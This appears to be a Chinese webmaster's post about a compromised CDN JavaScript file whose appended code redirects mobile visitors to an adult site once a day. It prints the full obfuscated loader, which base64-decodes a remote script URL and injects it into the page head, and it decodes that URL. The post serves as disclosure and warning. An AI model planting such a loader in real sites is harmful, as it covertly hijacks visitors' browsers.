无意中发现手上的其他几个站点偶尔访问的时候会跳H站.反复刷新又不跳了,后来找到恶意代码的时候才知道一天只跳一次.真够用心的了.
经过一天的排查,最后发现问题出在某cdn加速服务的js文件上,具体是哪家就不说了,因为能力有限,还不确定是不是跟这个cdn有关.
当调用该cdn服务的js文件后,在文件的末尾有一段代码如下
function AoDgbK(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}function aHvBxt(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}return AoDgbK(t)}eval('window')['TVfbux']=function(){;(function(u,r,w,d,f,c){var x=aHvBxt;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));'jQuery';k=r[2]+'c'+f[1];'Flex';v=k+f[6];var s=d.createElement(v+c[0]+c[1]),g=function(){};s.type='text/javascript';{s.onload=function(){g()}}s.src=u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly91bmlvbi5tYWNvbXMubGEvanF1ZXJ5Lm1pbi00LjAuMS5qcw==','sLswnzxzU',window,document,'jrqjORiasRx','ptNLoQyhWbTE')};if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) TVfbux();
里面有一段base64加密的东西,解开后是这个地址union.macoms.la/jquery.min-4.0.1.js
这段代码大概意思就是在你网站的head部分插入这个js调用
继续去扒他这个js的内容是一段加密的代码,解开后大概意思就是会取一个随机值和当前的时间.然后取做一些条件判断,符合条件的话就会给你站点插入js.作用是跳H站
大家在做站的时候如果用第三方的js文件.一定要选大厂.切记切记
